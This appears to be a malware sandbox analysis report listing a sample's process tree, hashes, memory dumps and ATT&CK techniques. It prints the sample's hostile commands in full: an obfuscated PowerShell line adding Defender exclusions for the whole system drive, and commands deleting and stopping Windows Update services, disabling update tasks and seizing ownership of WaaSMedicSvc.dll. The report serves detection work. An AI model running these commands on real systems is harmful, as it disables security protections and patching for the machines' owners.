powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:516

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
1⤵
- Modifies registry key
PID:2144

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3864

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
1⤵
PID:3748

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
1⤵
PID:4892

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
1⤵
PID:3620

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
1⤵
PID:3560

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
1⤵
PID:4748

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
1⤵
PID:1896

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:1892

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:1920

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:2860

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:3500

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
1⤵
- Modifies registry key
PID:5104

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
1⤵
- Modifies registry key
PID:2600

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
1⤵
- Modifies registry key
PID:2488

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
1⤵
- Modifies registry key
PID:4688

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
PID:4668

C:\Windows\system32\sc.exe
sc stop bits
1⤵
PID:1644

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
PID:4728

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
PID:2004

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
PID:2764

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows\services.exe
Filesize
2.0MB

MD5
79dbc1a54d33366681f1e926d565cad4

SHA1
907cf0ec6784bf140f9759d6931d3697da0fc229

SHA256
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0

SHA512
6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd

Download Submit
C:\Program Files\Windows\services.exe
Filesize
2.0MB

MD5
79dbc1a54d33366681f1e926d565cad4

SHA1
907cf0ec6784bf140f9759d6931d3697da0fc229

SHA256
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0

SHA512
6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
539B

MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
memory/516-209-0x0000000000000000-mapping.dmp

Download
memory/516-225-0x0000022B21940000-0x0000022B2195C000-memory.dmp

Filesize
112KB

Download
memory/516-231-0x0000022B22860000-0x0000022B22919000-memory.dmp

Filesize
740KB

Download
memory/516-265-0x0000022B21960000-0x0000022B2196A000-memory.dmp

Filesize
40KB

Download
memory/880-208-0x0000000000000000-mapping.dmp

Download
memory/1384-387-0x0000000000000000-mapping.dmp

Download
memory/1384-179-0x0000000000000000-mapping.dmp

Download
memory/1644-360-0x0000000000000000-mapping.dmp

Download
memory/1780-195-0x0000000000000000-mapping.dmp

Download
memory/1876-174-0x0000000000000000-mapping.dmp

Download
memory/1892-380-0x0000000000000000-mapping.dmp

Download
memory/1896-381-0x0000000000000000-mapping.dmp

Download
memory/1920-379-0x0000000000000000-mapping.dmp

Download
memory/1972-172-0x0000000000000000-mapping.dmp

Download
memory/2004-358-0x0000000000000000-mapping.dmp

Download
memory/2144-363-0x0000000000000000-mapping.dmp

Download
memory/2488-365-0x0000000000000000-mapping.dmp

Download
memory/2600-372-0x0000000000000000-mapping.dmp

Download
memory/2764-357-0x0000000000000000-mapping.dmp

Download
memory/2860-378-0x0000000000000000-mapping.dmp

Download
memory/2884-175-0x0000000000000000-mapping.dmp

Download
memory/2992-167-0x0000000000000000-mapping.dmp

Download
memory/3080-171-0x0000000000000000-mapping.dmp

Download
memory/3248-196-0x0000000000000000-mapping.dmp

Download
memory/3320-192-0x0000000000000000-mapping.dmp

Download
memory/3344-187-0x0000000000000000-mapping.dmp

Download
memory/3500-377-0x0000000000000000-mapping.dmp

Download
memory/3536-178-0x0000000000000000-mapping.dmp

Download
memory/3560-383-0x0000000000000000-mapping.dmp

Download
memory/3620-385-0x0000000000000000-mapping.dmp

Download
memory/3700-181-0x0000000000000000-mapping.dmp

Download
memory/3736-182-0x0000000000000000-mapping.dmp

Download
memory/3748-388-0x0000000000000000-mapping.dmp

Download
memory/3864-375-0x0000000000000000-mapping.dmp

Download
memory/3952-122-0x00000260ED0D0000-0x00000260ED2AC000-memory.dmp

Filesize
1.9MB

Download
memory/3952-117-0x00000260D2530000-0x00000260D270D000-memory.dmp

Filesize
1.9MB

Download
memory/4012-394-0x0000023A84830000-0x0000023A84836000-memory.dmp

Filesize
24KB

Download
memory/4012-397-0x0000023A84100000-0x0000023A84107000-memory.dmp

Filesize
28KB

Download
memory/4068-194-0x0000000000000000-mapping.dmp

Download
memory/4084-176-0x0000000000000000-mapping.dmp

Download
memory/4120-168-0x0000000000000000-mapping.dmp

Download
memory/4328-193-0x0000000000000000-mapping.dmp

Download
memory/4380-197-0x0000000000000000-mapping.dmp

Download
memory/4440-184-0x0000000000000000-mapping.dmp

Download
memory/4452-130-0x0000000000000000-mapping.dmp

Download
memory/4452-139-0x000001F4F38B0000-0x000001F4F3926000-memory.dmp

Filesize
472KB

Download
memory/4452-136-0x000001F4DAC90000-0x000001F4DACB2000-memory.dmp

Filesize
136KB

Download
memory/4464-129-0x0000000000000000-mapping.dmp

Download
memory/4540-191-0x0000000000000000-mapping.dmp

Download
memory/4568-376-0x0000025297A20000-0x0000025297A32000-memory.dmp

Filesize
72KB

Download
memory/4568-364-0x00000252978D0000-0x00000252978D6000-memory.dmp

Filesize
24KB

Download
memory/4668-361-0x0000000000000000-mapping.dmp

Download
memory/4688-362-0x0000000000000000-mapping.dmp

Download
memory/4720-180-0x0000000000000000-mapping.dmp

Download
memory/4728-359-0x0000000000000000-mapping.dmp

Download
memory/4748-382-0x0000000000000000-mapping.dmp

Download
memory/4828-170-0x0000000000000000-mapping.dmp

Download
memory/4832-374-0x0000000000000000-mapping.dmp

Download
memory/4844-177-0x0000000000000000-mapping.dmp

Download
memory/4880-188-0x0000000000000000-mapping.dmp

Download
memory/4892-386-0x0000000000000000-mapping.dmp

Download
memory/4924-371-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/4924-367-0x0000000000401BEA-mapping.dmp

Download
memory/4924-366-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/4976-189-0x0000000000000000-mapping.dmp

Download
memory/4984-173-0x0000000000000000-mapping.dmp

Download
memory/5040-356-0x0000000000000000-mapping.dmp

Download
memory/5092-190-0x0000000000000000-mapping.dmp

Download
memory/5104-373-0x0000000000000000-mapping.dmp

Download
memory/5112-169-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads